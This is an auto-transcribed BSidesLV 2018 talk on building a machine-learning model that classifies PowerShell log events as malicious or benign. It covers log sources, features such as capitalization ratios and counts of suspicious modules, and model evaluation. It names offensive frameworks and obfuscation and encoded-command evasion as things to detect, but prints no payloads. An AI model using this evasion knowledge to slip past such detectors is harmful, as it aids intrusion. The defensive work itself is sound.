GT - PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas

Name: GT - PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas
Uploaded: 2018-09-20
Duration: 46 min 10 s
Description: PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas Ground Truth BSidesLV 2018 - Tuscany Hotel - Aug 08, 2018

BSides Las Vegas46:1088 viewsPublished 2018-09Watch on YouTube ↗

Mentioned in this talk

Frameworks

scikit-learn

About this talk

PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas Ground Truth BSidesLV 2018 - Tuscany Hotel - Aug 08, 2018

Show transcript [en]

okay let's get this party started so uh this is an overly dramatic title really so it's uh developing a PowerShell classification model and the reason it's kind of overly dramatic myself discoveries you know it's got my first model right and so it was kind of the process I went through from start to finish from kind of observing high-level features and kind of saying hey this might work and going through that whole process and then also the pitfalls and solutions we hit we came up with along the way so this kind of follows pretty well after Rams talk with the PowerShell that he mentioned so that's one of the one of the references that I list at the

end there was a academic paper they had at the fairly recently so this kind of been our process for the last two years so Who am I I'm Derrick Thomas I'm a applied security researcher at East End tire we do manage detection and response I'm a converged Detroit conference organizer just a couple of us around here so we we hold a security conference every year and in a Michigan security member so I consider myself a security data enthusiast my whole life has been involving logs so you're probably saying to yourself I've lived a really hard life and that's probably true but uh so if you if you work with logs your whole life you've got to be pretty good at

doing analysis or that's a tool that should be picked up on Twitter you can hit me up D time LinkedIn email if you want to contact me afterward I'm always open so have a couple goals here I figure the audience is made up of kind of data scientists and maybe security professionals for data scientists I think they would like to learn about this problem the strategies for detection may be working with subject matter experts on you know how they see things and how they identify malicious activity the processes they go through security professionals you know if this is a concrete ml use case you see ml all the time it's buzzwords someone said ml blockchain AI you know

it's like what does that actually mean well this is a concrete use case and how we've derived value from it I think you should everyone should start looking at a detection a bit differently a lot of security professionals are very focused on like atomic IO sees very detailed observances and things like that and I think that moving up a level to a more generalized detections raise the bar for attackers and and everyone really just learned from my experiences I think that if I saw myself old Derek saw this presentation I would have saved myself a lot of time so this is our first version of the PowerShell product this was from probably implement about two years ago

the process I went developing a proof of concept and that proof of concept was used to say hey this is valuable we need to operationalize it spend time and resources to implement our production model to do real-time PowerShell classification across our entire environment and as we go through this knowing that you're gonna see some pitfalls you can see some things say hey that doesn't really work so I'm gonna cover at the end the pitfalls and solutions to those problems so here's the agenda we're gonna talk about you know PowerShell the problem why it's important how to get data and properties of malicious code and then the PowerShell classification in part two it's really just the how I started went

through my machine learning process there so this all really start back in 2016 so a while ago is kind of how I feel PowerShell most is use of PowerShell started to gain extreme popularity and I kind of followed true with Rams slides there and 2017 2016 and this began with you know as it always does a simple request from from one of my clients to monitor and alert on malicious PowerShell activity so you know following that's like whoa what does that entail was malicious PowerShell activity so being from the world of logs Sims things like that creating use cases that created rules create hundreds and hundreds of rules then I bypass those rules then I created more rules and then

I'm thinking this is insane there's got to be a better way for this so that's when we kind of clicked and it just you know hit us that you know maybe a classification model looking at our the things that we as analysts look at would be the way to go and so this is that story so we'll start off from the beginning like what is PowerShell it's a scripting language legitimately used for any administrative activity within your environment so basically administrators can do anything they want and automate it through PowerShell which is awesome it's super flexible but it's also for those same reasons that creasing lis leverage by our adversaries and pen testers you know live to compromise

servers and workstations what we call living off the land PowerShell is available in almost every organization and every workstation that your users are so living off the land is using legitimate tools to to meet your adversaries objectives right so they have the tools available they can do almost anything they want once they have access to a system so we dubbed this project blue steel and I'm going to talk about that later everyone either understands immediately or not so we'll see who gets that reference or maybe scared too to say they do all this was born out of client requirements for effective detective malicious PowerShell okay so why is it important you might say well okay Derrick you know you can

detect this why is this important why should I do this well it can let be leveraged in every stage of the attack look at the mitre framework they have one one tactic reference for PowerShell which is true it's you know it's for a code execution but with code execution you can perform any step within your kill chain and in meet their objectives so from recon all the way to exfiltration and command and control it's been it's appeared and crucially used by our adversaries so you know I'm basing my observations strictly off of you know new exploit frameworks that are coming out so we mentioned a few power sploit ApS attack it seems like every day there's some new tools to fill fill

a void of offensive capability just from going to conferences like this I've seen an increase in PowerShell talks to say hey here's how easy it is to use PowerShell to do offensive activities and defensive ones as well but I'm more concerned with the offensive we observed phishing payloads to our customers significantly so it's been on the rise over the last two years and then increased use and penetration test so I think penetration testers often rely on PowerShell and with the with the Microsoft implementation for logging and script block it's gonna become more difficult and so I see this being less the case in the future but right now it's being used drastically so PowerShell is extremely flexible it can

be used to to do what used to be high you can hide in plain sight so you can achieve your objectives steal creds or add a user to the domain one of the cool things and not cool things is it can execute in coded command so you can feed it a base64 string of code and it can execute that natively so that makes it tough for me when I'm looking at logs and you see an X base 64 blob of text is that good or is that bad I don't know at first yeah I thought okay this is always going to be bad and in reality across a large sample size we see significant use for legitimate

reasons so see things like chocolaty or ansible deploying or doing activities using encoding commands so I don't really think they'll just identify encoding commands really works with PowerShell you can obfuscate and execute code I'm going to show some samples of this basically you can slice and dice replace rearrange compress encrypt the data and then execute that code in any way you see fit and then also it's uh it's you can use it for file list attack techniques we've seen this significantly in kind of advanced attackers so execute code in memory you know run a schedule task and pull the code out of maybe a registry entry or something along those lines so ok PowerShell is important to to miner I

hope we're all on the same page there well first you got to get the data like any data science or or use case creation you got to have the data so so where is this data reside Power Cells very nuanced so it's very difficult data resides in multiple places each place has different amounts of data the associated with this so it can be executed in memory from the command line from a script file so each one logs differently so one of the main places we use Windows security log they list the command line straight from the security log and they're very easy to get you usually you know most organizations are collecting these already you might have

to check to see if your enabled process monitoring oftentimes this is enabled already in many organizations even better would be PowerShell script black clog so PowerShell and version I think 4 or 5 enabled script block logging what that means is that any code ever executed by PowerShell is logged in a file and available for analysis but this is a different log channel than then the security log so sometimes it can be more difficult to get enabling script block logging is more difficult by far than enabling the audit settings I'm going to show you a resource for that buts GPO settings you've got to have the correct windows management framework you gotta have the correct NAT

settings and you may not be up-to-date in many organizations we see mature organizations can easily implement this and some it's more of a challenge system on offense if you're familiar with system on it's a kind of I don't want to call a needy our agent but it does process you know significant process monitoring on Windows machines it's it's a assists internals tool and very popular in security community this logs process execution and can be used for for getting command lines and then any any EBR solution from its EDR solutions like CrowdStrike carbon black you know they're doing significant process monitoring oftentimes they have logs that can come out of that or you can query them for logs and say hey show me

all the PowerShell commands and command lines so here's an example and I'm gonna kind of try to outline the nuance of collecting these logs so from a command line I'm executing this in coda command so PowerShell dot exe with a coded command and then just a blob of text so that's what we would see if we're monitoring these logs so that can be difficult but in reality this is just showing the PS version table it's showing the version of PowerShell and I'm going to show you what these what this log looks like in the actual log so here's the Windows security log 46 88 you can see that at the bottom it shows the encoded command what what I really

concerned here is the process command line at the very bottom this is a newer feature in Microsoft you have to enable this through GPO and I suggest everyone does does this so there's so much more value and it's easy to extract the command lines from this I'll show you a reference for for doing that in a bit but the important to note that you see basically exactly what was typed in the command line is what's showing up down there so here's a Microsoft script block log and you'll notice that in the script block well you see the actual code those executed so that was the basic C 4 encoded command rate that shows you the

version so this gives you I mean if you're not seeing this already this gives you so much more value because you can see the decoded commands so that's a step that you look that you kind of can skip with your monitoring solution identifying the encoded command and then D and then decoding the base64 blob this can be this might seem easy but it can be it's difficult because power shell has aliases and it's very flexible with you know - EDHEC - and coded command etc there's a lot of ways to do this so this will show that encoded command and really we use this for identifying legitimate uses of encoded command because we'll see a ton of obfuscated

commands that cannot be decoded automatically if we haven't seen it before but those are you've never seen a legitimate use of that yet so here's here's the references for enabling command line process auditing and enable script block logging I definitely recommend the second link for powershell loves the blue team that's kind of what the blog posts from lee holmes here like tony I think in 2015 kind of got me into really looking at PowerShell I'm thinking this is important and really how Microsoft some of the features that they were implementing the time it was a little bit difficult for many organizations to transition to script block logging and implementing some of these features but now it's it should be

much more doable so we enable them we're collecting logs on the workstation or server how do we get them for analysis really you want to do this any prefer if you have a sim your preferred sim vendor should be able to help help with this but I'm gonna go through kind of a built in function make people to know about it's easy to use Windows event forwarding through GPO to configure the the forwarding of PowerShell logs from the workstations to a central collector at the central collector you can install an agent like an X log and say hey send all of these events from the forwarded event store to a syslog server to a database really to anything you want so

it's kind of just one way for analysis but if you have a sim most likely they should be able to collect the operation the script block logs and Windows security logs from the endpoints okay so analyzing the powershell data i spent so much time trying to create rules on detecting malicious powershell and then just to realize that i don't think this is gonna work so you know i said in the corner and cried for a little bit and i got up and i said okay let's let's figure out you know how we're gonna do this so i - major from that many most samples were obfuscated but when they were obfuscated immediately they still after you've

reviewed hundreds and hundreds of logs they stick out like a sore thumb no programmer in the right mind can execute or can code that I don't if they do they're messing with somebody so I have yet to see a legitimate use of obfuscated code if they were not up a few scared they were frequenting strings that are known to be suspicious or malicious so like basically that's saying if I look at at a suspicious event almost immediately I can tell that is this is doing some shady stuff and I don't even program in PowerShell I'm a threat analyst I look at Krieger use cases things like that so it's pretty straightforward to understand at least

in my opinion after you've looked at some and and studied this a little bit what's bad and what's good so we started identifying high level features that seem to indicate you know what what's malicious codes if you can look at it and understand that it's malicious why is that so we started asking myself questions why is this motion here's all the all the reasons why so I'm gonna start going through that you know the first one really is quantities have known suspicious of malicious modules immediately when you look at something you say this is taken from a real malware sample deployed through a word doc and executed and it has references to invoke shellcode powersploit

meterpreter persistence really see anything that's a red flag immediately you know something's going on there hopefully it's a pen test and if it's not you know you guys start digging in there and you see there's a high quantity of these in the events that's being executed we notice too that there was a lot of kind of evasion tactics like strange capitalization it appeared that the code would be randomly uppercase or lowercase most code is not gonna not gonna do that so how would you identify that well I imagine that most of your code is kind of a known ratio of uppercase to lowercase based on the first letters and things like that and these when you have two times the

uppercase or equal amount uppercase to lowercase that's that's pretty significant then obfuscation and coding this really entails any custom way an adversary might try to hide your code so they can slice it dice it rearrange it replace it put it back together compress it execute or encode it anything so there's a great framework called a invoke obfuscation that basically can take you know your nice PS version table make that you know ten letter command into a 1000 word command-line argument that's illegible to any human and encoded in multiple different ways but yeah it can still be executed and what this does is obscure the code from automated analysis logs are going in your sim you're

looking for code and you're looking for specific strings like I'm gonna look for an interpreter invoke shellcode or maybe you got an awesome list but this is gonna bypass that then we saw in a lot of samples from malware it would be a high ratio special characters you look at this and I don't think that this is known PowerShell to anybody I hope not this just looks ridiculous and why is it look ridiculous it just has so many special characters so we figured that would be a good one to look at and then finally what's the cosine similarity there's a great blog post will reference here from Lee homes where cosine similarity basically says does this

event how similar is it to known good events if we have a list of known good label data we could take that event and say you know score it based on how similar it is to those so from there we can here's an example of just taking two events and it's scoring it you see that the top one is an event from a good log source and a good log source that scores pretty high the cosine similarity of a good log source to a malicious log source very low and what we do is we take our set of label known good and compared to and compared to the known bad that we're examining at that moment

and so just knowing that this is if we implement it's pretty easy to implement in Python or R so that's just a function you can use to derive your your features so we've outlined kind of a lot of high-level features these are things that our analysts are looking at and saying and these are what they're using to judge the how suspicious that event is so now we're kind of going to you know why am i learning and how to classify this and train a model so as I learned you know there's a never-ending cycle of creating rules and detecting bad behavior and then detecting the bypasses and touching the bypass bypass and go out forever so we have a better

way with those features we kind of so we had identified the high level features those would be tougher to bypass then you know just string matching and things like that and honestly I as a data enthusiast want to work on a problem that wasn't classifying flowers right so I've gone through some classes and you see the same stuff on the internet and I'm like okay this is directly applied to me and I think that we can do this so it was a lot more fun my machine learning really comes from self-taught you know I I'm not a programmer I'm not a data engineer or machine learning expert I've studied Coursera courses for the last probably

three or four years and just kind of tried to learn because I think it's a tool that any data analyst secure thread analyst should pick up because these this is I think where it's going adversaries are making their behavior fit in with normal activity that's getting tougher and tougher to identify everything I didn't really was in are but I built this inside kit learned just because it transfers to my team a lot of people work with Python better I was the only one that kind of I wanted to to work with things in our psyche learned is great documentation so you know I had learned the the frameworks in our using the care package looking at this I was

able to do this pretty quickly the the raw events came from both windows security logs and the windows script block log so we we had samples from people who are friendly and said hey Derek I'm interested in what you're doing here's a whole ton of data we even generated some malicious samples for you here you go so we took those collected them and really we need to make it into form suitable for learning so if you look at this this is really a free text right so free text in this case isn't going to work too well in our learn in our in our learning algorithm so we need to trans transform it into a form that would be

so we reviewed we locked me and my partner locked ourselves in a room for probably a months on end classifying you know I think we had like initially a lot pretty thousands and thousands of known good and known bad events also generated adversaries samples also collected from our fishing campaigns things like that I'm really just begged borrowed and steeled as many samples as we could oh we didn't steal anything it was AA legit so I have to say that so for each event we can't we create a vector of value so first was a ratio of uppercase to lowercase like I mentioned special characters and total characters elf characters and total characters the cosine similarity the

count of suspicious modules counts of malicious modules now keep in mind this is what we used at first this is not what we use now and we'll go into the the details first list did work pretty well so here's what we here's a sample event this has been some some command off you skate with invoke a few skatin we create functions to derive each one of those values um those are the values there and basically it's just a comma it's like CSV file full of label data yes so the events that we got were so when we store the events are stored in raw text so we collect them and I guess we definitely are not store in XML so

we've collected them through the process kind of similar to what I showed earlier you have the log sources and it's collected at central location NX log sends them an x log transmits the in text so it's not an XML or any other format so it's just open text that we process and essentially we extract the last field says process command line it's formatted almost exactly the same - with the formatting character so so here's an example of how we derive the values and what the which each record looks like it's just a CSV file when you think about it and ends up looking like this and if you're familiar with machine learning and you see a file like this you're like

okay this is kind of all the hard part has really been done at this point there's some issues with this data but it's there and it's usable so it's time to start evaluating algorithms so there's so many when I look at side killer and there's so many algorithms I'm not a data scientist so I'm not sure which ones will work the best so what I found was that I'll just try all of the ones in there so I found some good sources for kind of creating a test harness to iterate through each one develop the accuracy don't kind of go through that but these were the initial ones we had more like an MLP classifier

so we ended up looking at other ones in addition to these but they all performed very similarly we use k-fold validation so we took our test set that includes known good known bad samples we divide that up into like 80/20 with that 80% data that sort of test set the 20% was kind of our validation set and with that test set that's what we used to train the algorithms and this is kind of the process of how we trained we use K full validation which what that does is say hey we're going to put the data up K time so in this case five and we're gonna iterate through that and in training on four pieces of data and test

the accuracy our test of metrics on the fifth piece of data and then we're going to iterate through each piece so all the data has been training all the data has been tested we did tenfold ten splits but in this examples fives but either way it worked pretty well so we had scoring with accuracy our accuracy was off the charts I'm like okay ninety-nine point seven percent I'm done here you go guys and and really that was pretty good but there was issues with this so we here's the the distributions of the different algorithms and how they worked out see the random forest linear aggression k KN and cart worked pretty well there was some of the other ones that did not work

very well and I'm going to talk about why those didn't work well at the end you may be seeing this already but anyways I saw there's four that worked approximately the same each time I ran through that that would change slightly that's one thing to keep in mind with machine learning algorithms they don't it wouldn't be the same results every single time you would get slightly different accuracies and metrics each time you run through the process so okay accuracies 99.7% but in my data set it's highly imbalanced and we'll talk about that issue later but um so even if I were to guess benign every single time I would have like a 93% accuracy which

sounds good and reality that's the worst that could possibly do so we need to look at other metrics like fault fault or precision and recall so these two metrics kind of are what we're interested in because we're interested in a good ratio of catching everything but not sending false positives to our sock too often so what you know precision what percentage of suspicious classifications are truly suspicious so if I guess there's a hundred malicious samples then what percentage of those are actually malicious recalls a little bit different so what percentage of truly suspicious events were classified as suspicious so let's say there's 150 truly suspicious what percentage of those are actually were we're classified as such so it's a

slight difference took my little I took my head to to a while to wrap around it but Wikimedia is like the classic picture of how to take and precision and recall I suggest taking a look at that anyway we use a what we end up using that for one score but here's the precision so the precision for random forests pretty high 98% so what percentage did we classify our collections were truly suspicious 98% or recall what percentage of our truly suspicious events were classified as suspicious 96% so that was pretty good and we end up using our F 1 metrics so 97% and random for us we're pretty happy with this is significantly better than our

rule-based approach that's triggering thousands of false positives to our stock and missing some some known things that we thought it should be catching and we end up catching through other means detection through other products etc so what this so what we're interested in is kind of a good balance we can't send too many false positives to suck we want to catch everything and so how you show that through the ROC curve knows you know I think this is obligatory for any machine learning model this ROC curve looks ridiculous keep in mind based on one customers worth of data when I created this so you know without a extremely varied set you're gonna get a really good looking

ROC curve but you know what this shows is that it's way better than luck and so we're we're we're doing pretty well here so we end up with the random forest algorithm it was the most accurate test at the time we ran that for a long time against all of our data so the algorithm needs to be tested against previously unseen data so we're training and testing on the same on our on our test set of data now I'm gonna give the deck that 20% that I set aside we're gonna run this model and say hey how does this do I'm previously unseen data it's very important if you're not familiar with machine learning that you don't train on the data that

that you're validating at that's like memorizing version one test and then giving version two and you're like aw crap none of this is the same so we train the model and test the accuracy on the validation set extremely high so you see that on this test we had 1500 set you know roughly 1,800 samples ninety-nine point eight percent accuracy and you see the the f1 scores were really well there so we think that this this was really good at this point is when I show this I'm like okay this is where I'm trying to justify putting additional resources to get more data to talk to more clients to get the pipeline to do to say hey we want to apply this

to everybody and so random force with the highest accuracy we use this for a while it's very successful so the you know what what I shows we reduced false positives significantly our stock was looking at every instance of encoding commands that's used quite often for for legitimate uses so they would have to decode the the encoded command take a look and make a judgment call there that's time-consuming in a waste and ends up being like one percent the encoded commands were actually malicious we increased our true positives so things are being missed before are not being missed now so when we detect that most PowerShell actually caused this service to run that service running is

what triggered like a carbon black watchlist rule we think wow we should have saw this PowerShell event earlier why but now we're seeing those I mean we decreased false negative so we can do this by we ran in parallel with our existing rules so we could see the things that were we're missed by them and that we would never have known what for isn't for this and we also test on sandbox events we get tons of phishing documents and so they detonate them in a kuku sandbox we get the logs we analyze those if we see a PowerShell sample from a kuku sandbox most likely that should be malicious and someone that reviews every single one of those so that kind

of helps us say hey okay this thing's working well and that's it no I'm just kidding so if you look through here pitfalls and lessons learned this is the gold right like advice if I saw this is what I would be happy with so that was the end of the POC I'm definitely out then the story this was probably the middle of 2017 when when this portion was donner early 2017 so we learned a lot of lessons and we enhanced this model significantly so when I go through some of those enhancements talk about some of the problems obviously can't talk about the exact specifics of our pipeline that we're running you know for for our

clients but I think that with these blessings or what we derived that from so it's really worth its weight in gold in ml so one of the one of the biggest questions I get how do you account for overfitting how do you you know feature engineering our data was pretty good we had a lot of much of samples we generally lob malicious samples we were able to get them from sandbox events we were able to get them from clients and we took care to create a separate our test set our validation set but one of the issues is our hand engineer you can see that these are really hand engineered predictors right so we created these we decide what's

suspicious we decide what's malicious it requires our judgment to do that also each one of those malicious and suspicious samples are not are not this as malicious as the others right so you have a suspicious events you see invoke expression often seen in malicious samples but also seen in legitimate samples at first I thought okay these were always malicious that's not the case at all so how do we fix that so we already played really good close to train eval to separate our training and validation sets what we did here was update our feature engineering to address this issue we ended up drastically increasing our feature set but I can't go too much into this but basically we stopped using

the suspicious of malicious count list it worked pretty well but and better than our rule set but it did not work as well as we needed it to so I kind of it's about as far as I can go there and if you think about it if I'm creating a list of suspicious and malicious modules that's from my experience reviewing these logs and so even though I split the training and validation set I essentially looked at the validation set and generated this list of suspicious events from that set and now I'm creating a true training the model on that so really that's kind of overfitting to that data and we kind of learned that afterwards when we saw when

we introduced more data you start seeing things like calm and common modules used at one client that are not used at the other you know like oh this is actually use I can't believe that like encode a command and VOC expression so that should help if you're working on this there's also some references at the end the bad data so I found that certain algorithms prefer normalized event data's rather or event data rather than the raw number so if you saw we had specific counts like 16 and then we would have the cosine similarity be 0.05 those are those are not normalized or standardized in any way and a lot of algorithms require that so basically after when I was looking to

research this standardizing normalizing those events are really good for any algorithm to work so now everything's a number between 0 & 1 you take all those suspicious counts and you convert them into you know less numbers between 0 & 1 like I said and this is probably the reason for the really poor performance and some of those algorithms that was showing earlier in the distribution we didn't go back because random force worked really well still even when I normalized data so and we can really increase we'd spend a lot of time and create increasing the accuracy for very little gain so here in psyche learning you have the the normalizer and standard scaler you can look that up basically we

supply that to the data set and then train and predict based on that data here's some links for that if you're interested and I really just suggest look at the site killer and especially if you're new it walks you through everything and really make sure the data fits your algorithms like you know I'm kind of blindly saying normalizing data is best there may be some edge cases where that's not true I'm not sure but it's worked well for us probably the biggest one in any machine learning data science problem not enough data lack of diverse data I'm in a decent position not as good as Microsoft is but we have quite a bit of data so we're able to you

know each model makes the predictions based on what we've previously seen so of course you want to see as much as possible not enough data and and really need diverse data so like I had a good quantity from one client when we introduced other clients they do things differently they what's normal to them is not normal to others so we're able to kind of differentiate that learn those features and apply that to everybody and really the way to do this get more data beg borrow steal don't steal it generate additional data walk with a PowerShell there's lots of ways to do this there's like I said there's those PowerShell frameworks to do bad stuff that you don't need to know

PowerShell that well I'm pretty familiar with adversary techniques and in tactics so I'm able to kind of run this in in a virtual environment generate the data that we want without much of an issue but uh it's it's not that difficult also if you get phishing samples you can take a look at that so also even just looking at Twitter we literally saw samples on Twitter so they were pretty interesting oh one other thing would be label label label make the labeling as easy as possible when we had a system where it was difficult you know I'm literally copying these features from one file into another and combining them that sucks if you have a system where you can

review the event I see the prediction and classify the event that's that's great and then use that for subsequent training of training from the beginning measure your performance so I'm a security guy I'm not a data science guy I didn't measure hardly anything at first probably nothing I just saw all this classified most everything pretty well then I start getting questions asked like well what's the false negative rate what's the false positive rate show me a confusion matrix show me a rack curve show me all these things and I started learning that as I went through from the beginning make sure you can measure that and we're still working on that a little bit I'm just have good

measurements to say okay this is operating well because you know one of the questions I get allows concepts what are we classifying now as much as that we may not have generated classified back then that's hard to understand and we take a look at that through kind of QA type activities when we see things that are being classified from a from a sandbox we take a look at that if it's not if it's classified benign and we need to understand why it was classified as benign so it's easy to avoid collecting metrics want this probably if you don't if you take one thing away your ability to describe the value of the model is as

creative as as critical as the value of classifying the events because if you cannot describe the value of this to people that are going to give you time and resources then it's never going to be implemented this has to be done and has to be able to show that this will provide value and I'll show you how how I did that so for our use case up precision recall far more important than accuracy we had a highly unbalanced set one thing I learned from this count conference was that you know used if I'd known about smoke back then for for compensating for the imbalance data set that probably that may have helped a little bit we

didn't really have that much issues though in terms of our precision and recall being affected by this though so I'm not sure how much of an imbalance data set causes problems in this case measure everything from the start make sure the value is easy to convey on this last one code names tend to stick around so from the beginning we did not know if this was ever gonna work it was kind of a pie in the sky activity my partner said hey let's call it a project blue steel it sounds cool it's one from one of the best movies known you know probably next to Casablanca so if you haven't seen it go check it out you'll

be overwhelmed I'm sure so obscure references are obscure not everyone has seen Zoolander so that's I learned this one the hard way because blue steel just kind of sounds cool if you've never seen about it right it's like steel it's blue you know but now it stuck around though and you know you may see it if you take a look out there but so here's how really how I communicated the results we took a look at our detection efficacy I had we had an increase in 28% true positive rate so we're catching more stuff with this our false positive reduction was decreased by 99% and that's because we're able to we're not investigating every single instance of a

coat of command and every single instance of invoke invoke expression and we see that a lot especially where people are orchestrating updates and things like that that alone showed said hey this reduces time saves money reduces analyst load which time is money right and in the case of a sock and so we're like okay let's let's move on this so that was kind of the end of the POC at that point we moved on it we went to production eyes there we input we implemented collecting metrics at first like on my POC is a batch processing Ram I'm just classifying a whole batch of events we're not doing this in real time now we've got a real-time pipeline where

we're taking a look at a large scale pretty much all of our clients data and pushing it through this so we've got so much value from what ends up to be far to me I think being far less work than creating rules constantly updating those rules constantly whitelisting those rules constantly creating new ones trying to bypass rules things like that so we were quickly able to iterate and generate or both robust model it was easily updated so we update with new samples constantly we had a training you know a way to train the data efficiently and we constantly monitor for false positives and false negatives right so we we obviously take a look at any false

positives that come or any all the motion samples anything classify as much as being looked at anything that's being generated from a sandbox that's classified benign is being looked at so I mean it's impossible say I'm looking at all false negatives obviously it's one of the hardest things you can do but we're doing a pretty good job there and with this we're raising the bar significantly for for our detection so it's it's far more difficult to evade this then change the capitalization on your on your script to bypass some case sensitive rule that's in place and improved analyst efficiency so that's really what this was all about and so that's about it there's a merging work

in this area so detecting malicious PowerShell commands using deep neural networks was a was a reference paper recently released or academic paper recently released I'm not sure if that was the one that Ram had referenced but it looked like it could have been revoked confiscation is one that were they were they're using kind of machine learning techniques to detect a few skated code and then also firewall far I recently released a blog post those similar detection mechanisms so if you're interested in this subject take a look at those they all do differ one of us do things a little bit differently every one of us has had pretty good results and we've operationalize this for really two years and it's been we've

cut we've caught a nation-state attackers pentesters really highly advanced threats across many locations so probably the best work I've personally implemented so gives more resources right so I have the data set and Jupiter notebook online if you want to go through and kind of just be kind you know like I said I'm not a programmer or a data scientist but that's kind of a walk through that you could take a look at and do yourself the data set does not include PowerShell code because I can't show that it's usually specific to the organization you might even have passwords or user names in that in some cases we do our best to remove that info confiscation revoke obfuscation from

Daniel Bohannon I hope I'm pologize if I got that incorrect really that's how to generate adversarial samples and how to detect office created samples if you want to Palo Alto has a ton of encoded commands thousands and thousands and thousands so if you want to take a look some samples see the the plea home says the blog post like cosine similarity that's kind of what got me down this row when you see this that was hard to do using that cosine similarity text ops K code very well and then machine learning mastery process for working through machine learning problems a very wise man showed me the this process here so how you could go through from training

testing showing metrics things like that and this is a good way to do it so that's about it do we have any questions

the things you were classifying were they an overall PowerShell script was it a line of code was it an individual execution within a line so they were either two things they would be from the command line just the just the power this the command line process so be the binary and then the all the arguments that you provided also so that's just one of them so it's an event and we're pulling one feel from that if at the very bottom one second won't be the script block log so if you were to execute like let's say PowerShell that exe do bad stuff ps1 that you wouldn't be able tallip that's malicious through classification but the code that's

executed from that is stored in the logs and they divide those up there's like a limit like a thousand character limit and they'll divide those up we take a look at those as well so

yeah thank you I'm not gonna say that first two lines that I said but I get I get that admins need to execute power shell to do their job but what if they're doing at a in a window and if you notice power shell being executed outside that window then you just you just raise an alert that would absolutely be the best right like if you you would have that's kind of like a white listing approach and if you're in a mature organization that would work very well but I find many organizations have a hard time even logging PowerShell so to implement a policy like that would be extremely difficult and unreasonable in many places so yeah absolutely I would say

that or you could even create white list of people who can execute like normal users may not execute power shell things like that so you could potentially do that a white listing approach but I find that to be difficult and in reality isn't implemented that well if you can do that do it absolutely so right you know questions as far as detecting these malicious PowerShell scripts is there anything that you've been working towards to make a case for preventing them so that in real-time that it would be stopped before the damage was done so things like that are done that's kind of out of my realm of concern I'm a threat analytics I developed threat analytics

right so we have you know really in reality if you can do preventative measures like least privilege type stuff you know we have advisory services like say hey here's what you guys should do if you you know good passwords don't get exploited to begin with so they can execute power shell I don't look to much people have talked about signed PowerShell things like that I think that would help but I'm just more only thing I really like to do is to tech bad stuff so unfortunate a ton but I'd be interested in what what other people are doing there we have only time for one more question any last questions hi I'm so you got data for

the Cabal a and also from script block and for the scripts they can be very long right so do you see any difference or no whether your fest when you try to get a features or like notice the ratio looks different from the from the data from script block as process from the command line so do it now not really I haven't noticed that not say that there aren't any I hope that if they are that they're being learned in the process because we have you know if it's intermixed also anything you see the command line is typically included in the script block log as well so if you saw a PowerShell they exceed what

the encoded command you'd still see that in the script block as a separate event as well so that would be included and even if you're just looking at the encoded command so I mean definitely the the scripts are longer right you got heute like backup jobs that are very long but those would also be broken up so how you how you whether you reassemble the script blocks or analyze them in blocks kind of getting into too much how we're actually production eyes this and I don't want to get too far but you know you can reassemble the script blocks or you could look at just the script blocks because one of the texts you see is okay well mix lots and lots

of known good code to to sway these types of heuristics but if you don't reassemble them then you know maybe there's a block that contains that potentially you could spread the code throughout the whole thing what I noticed is attackers don't do that yet so it doesn't really answer the question but I haven't seen I haven't observed that myself yeah thank you [Applause]

GT - PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas

Related talks